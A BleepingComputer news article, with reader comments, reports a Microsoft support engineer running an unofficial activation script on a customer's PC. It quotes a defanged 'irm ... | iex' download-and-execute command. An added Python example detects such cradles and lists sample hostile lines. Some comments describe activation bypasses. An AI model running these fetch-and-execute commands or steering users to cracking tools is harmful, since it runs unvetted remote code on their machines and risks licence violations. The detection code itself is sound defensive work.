https://www.bleepingcomputer.com/news/security/microsoft-support-cracks-windows-for-customer-after-activation-fails/
Microsoft support 'cracks' Windows for customer after activation fails

By Ax Sharma
March 16, 2023, 08:14 AM

In an unexpected twist, a Microsoft support engineer resorted to running an unofficial 'crack' on a customer's Windows PC after a genuine copy of the operating system failed to activate normally.

It seems this isn't the first time, either, that IT professionals have employed such workarounds when under pressure to close out support tickets in a timely manner.

A 'crack' is worth a thousand support tickets

A South Africa-based freelance technologist who paid $200 for a genuine copy of Windows 10 was startled to see a Microsoft support engineer "crack" his copy using unofficial tools that bypass the Windows activation process.

Programmer and content creator Wesley Pyburn, whose online channels include TCNO (TroubleChute & TechNobo), explains his struggle after purchasing a copy of Windows 10 through legitimate channels:

"I can't believe it. My official Microsoft Store Windows 10 Pro key wouldn't activate. Support couldn't help me yesterday," tweeted the technologist.

"Today it was elevated. Official Microsoft support (not a scam) logged in with Quick Assist and ran a command to activate windows... BRO IT'S A CRACK. NO CAP."

[Image: Microsoft's support chat session with Pyburn involved engineer running a crack (Twitter)]

"It's literally easier to crack windows than to pay for it," exclaimed Pyburn.

Microsoft Product Activation, as commonly seen in Windows and Office products, is Microsoft's DRM technology to ensure users are running the company's genuine products as opposed to pirated versions, and are compliant with the license terms.

Windows XP-era users may also be familiar with Windows Genuine Advantage (WGA), a validation process that Microsoft earlier enforced to automatically 'deactivate' pirated OS copies.

"Activation helps verify that your copy of Windows is genuine and hasn't been used on more devices than the Microsoft Software License Terms allow," according to Microsoft.

Microsoft's official Windows activation methods involve either the customer entering a 25-character product key when prompted, or signing in with their Microsoft account to apply a digital license. In some cases, customers may also call customer care to "activate by phone."

[Image: Typical Microsoft Windows 10 activation dialog prompting for a key (Microsoft Community)]

By contrast, software "cracks" and stolen product keys are commonly used by users looking to pirate software, something which is forbidden both by a company's licensing terms and by law in most jurisdictions.

The Microsoft support engineer in this case ran the following PowerShell command on the customer's Windows PC (URL slightly modified to prevent execution):

    irm hxxps://massgrave[.]dev/get | iex

The command establishes a connection to massgrave.dev, an unofficial repository of Windows and Office "activator" scripts that may slip under the radar of most antivirus products. Further, the Invoke-Expression (aka iex) command runs the downloaded script, as seen by BleepingComputer:

[Image: Windows 10 activation script from Massgrave.dev]

"Working in IT I can 100% believe this lmao," commented one user. "They're probably as dumbfounded by the issue as you and/or don't have a better solution and it solves the problem/resolves the ticket so they're happy."

Cracks, warez, pirated software pose risks

Using "warez," cracks, and other unofficial means to bypass software copy protection is often frowned upon. Other than falling in a legal gray area and being akin to pirating software, these methods pose a security risk. For example, third-party scripts claiming to be software 'cracks' may instead be malware.

To clarify whether what the Microsoft support agent had run was indeed a crack, Pyburn reached out to Massgrave's staff via Discord.

Not only did the website staff reply affirmatively to the technologist's question, they further claimed it wasn't the first time they'd heard of a Microsoft engineer doing this.

"This is the second time someone reported here that it's being used by Microsoft support agents. It's not official and not legal," writes WindowsAddict, a Massgrave staff member.

[Image: Massgrave Discord staff suggests Microsoft support often uses these tools]

Naturally, such workarounds, when employed by a software company's support staff, would leave just about anyone startled.

"I can not believe Microsoft's answer to a broken activation system is to crack windows via official support channels," says Pyburn.

"...AND IT WAS OFFICIAL SUPPORT. The entire reason I paid was to avoid rootkits and other malware COMPLETELY. Then they crack it for me."

BleepingComputer approached Microsoft for comment in advance of publishing.

"We strive to provide best-in-class support for our customers. The technique you described would be against our policy," a Microsoft spokesperson told BleepingComputer.

"We are investigating this occurrence and will take appropriate steps to ensure proper procedures are followed regarding customer support for our products and services."

Update March 17th, 1:13 AM ET: Added statement from Microsoft received after press time.
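The command quoted in the article downloads a remote script and hands it straight to Invoke-Expression. The following is an added example, not part of the BleepingComputer article or any Microsoft tooling, showing one way a defender could flag that download-and-execute pattern in PowerShell script block text. The function names and the `example.test` hosts are constructed for illustration, and the matching is a plain-text heuristic.

```python
import re

# Tokens that fetch remote content and tokens that execute a string as code.
DOWNLOAD = re.compile(
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|curl|wget)\b"
    r"|\.(downloadstring)\(", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL_HOST = re.compile(r"https?://([^\s/'\"|)]+)", re.I)

# Script-block texts as they might appear in PowerShell script block logging
# (Event ID 4104). Entry 0 is the article's command, still defanged; the
# rest are constructed for this example.
SAMPLES = [
    "irm hxxps://massgrave[.]dev/get | iex",
    "IEX (New-Object Net.WebClient).DownloadString('http://updates.example.test/a.ps1')",
    '$s = Invoke-WebRequest -Uri "https://cdn.example.test/setup.ps1"; Invoke-Expression $s.Content',
    "Invoke-RestMethod -Uri https://api.example.test/v1/status | ConvertTo-Json",
    'Invoke-Expression "Get-Date"',
]

def refang(text):
    """Undo common defanging so reported and logged indicators compare equal."""
    return re.sub(r"hxxp", "http", text, flags=re.I).replace("[.]", ".")

def find_cradle(script_block):
    """Return (downloader, host) when a block both fetches remote content and
    hands a string to Invoke-Expression; return None otherwise."""
    text = refang(script_block)
    dl, ex, url = DOWNLOAD.search(text), EXECUTE.search(text), URL_HOST.search(text)
    if not (dl and ex and url):
        return None  # a download alone or iex alone is not the pattern
    return ((dl.group(1) or dl.group(2)).lower(), url.group(1).lower())

def scan(blocks):
    """Return (index, downloader, host) for every flagged block."""
    hits = []
    for i, block in enumerate(blocks):
        found = find_cradle(block)
        if found:
            hits.append((i, *found))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(hit)
```

The extracted host can then be compared against an organization's list of approved script sources before raising an alert.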
Ax Sharma
Ax Sharma is a Security Researcher and Tech Reporter. His works and expert analyses have frequently been featured by leading media outlets including the BBC, Business Insider, Fortune, TechCrunch, The Register, and others. Ax's expertise lies in vulnerability research, malware analysis, and open source software. He's an active community member of British Association of Journalists (BAJ) and Canadian Association of Journalists (CAJ).

Comments

GT500 - 8 months ago
Good old KMS. The source of so many ransomware infections in the past... And probably miners, but when your PC's performance has tanked and you don't know why most people assume it's time to buy a new PC, or just live with it until it's time to upgrade.

nauip - 8 months ago
Chances are the MS Tech used the HWID bypass. It's permanent (unlike the KMS that occasionally gets cleaned) because it doesn't require an executable. It also frequently survives a re-install in my experience.

xafase - 8 months ago
Issue was resolved and ticket was closed. The tech doesn't care. They aren't paid to care. They are paid to close tickets. Bonus point! If ChatGPT told the tech to do that.

lonegull - 8 months ago
The short time I endured doing tech support they actively encouraged you to start the customer on any action to get them off the call ASAP. Quite a mess at Microsoft if they can't activate their own product.
Had an experience with a new printer where even the manufacturer tech support couldn't make it work. The tech said they couldn't find the 'advanced drivers' in Windows (still don't know what they are) and told me to contact Microsoft or the OEM. Kept telling them I built the system (I am the OEM) and it isn't a Microsoft\Windows problem, but they wanted me off the call. Returned the printer for a refund.

EndangeredPootisBird - 8 months ago
I would think that out of anyone, people at Microsoft would know that cracks are the most common attack vector of malware.

speedingcheetah - 7 months ago
This is just, weird. You do realize though, that any product key off any old computer, even brand name OEM ones, works still to fully and seemingly legitly/legally activate Windows 10 and 11. I have used keys from long dead and recycled Win 7, even Vista machines, both laptops and desktops, to activate Windows 10/11 on many modern builds. Where I used to work, even years back, dig out of the scrap pile old COA stickers still stuck to the bottom of old scrapped Dell and HP business laptops, or desktops, and the keys have worked fine to activate and shows as "Activated with digital license" in the Activation page of Settings. It even does something to add the key to your MS account, and if you wipe and re-install the PC, and soon as you log into your MS account, it auto activates the OS for you.
Microsoft so desperate for users to move off 7 back in the day, to 8 and newer versions, they let old keys still work, claimed later on that will no longer be possible, and you for sure have to start paying to upgrade, but alas, they never disabled the ability to use old Win 7 keys to activate their current OS.

Mr.Tom - 7 months ago
You don't need a Mic Acct for it to auto-activate. Once you're "activated with a digital license", you can wipe it and reinstall without an account and it self activates. But what's cool with activation "tied to your Mic Acct", if you build a new computer and even move your old drive to the new motherboard, your windows activates with the new motherboard.

luvr - 7 months ago
Yet another proof that DRM = "Digital Restriction Malware".

cprbob - 7 months ago
this isn't KMS. And it's not a 'crack', it's at worst an exploit or unpatched vulnerability.
it's HWID, it's permanent, as good as the genuine activation process. BECAUSE it is the genuine activation process (well mostly)
to understand that read the docs here: https://massgrave.dev/hwid.html
also the tech did nothing illegal. did he violate a work policy, who knows. microsoft may have an internal memo because these scripts are an easy fix when something is broken. and are 100% reliable. forever
is it Illegal? No (well maybe but you aren't the courts so let's not pretend to be one)
the "license" is neither a product key nor HWID token, it is the RIGHT to use the Product granted by the purchase of said software product or hardware with said product installed
the state of the activation ticket has NOTHING to do with the legality
Copyright © 2003 - 2023 Bleeping Computer LLC - All Rights Reserved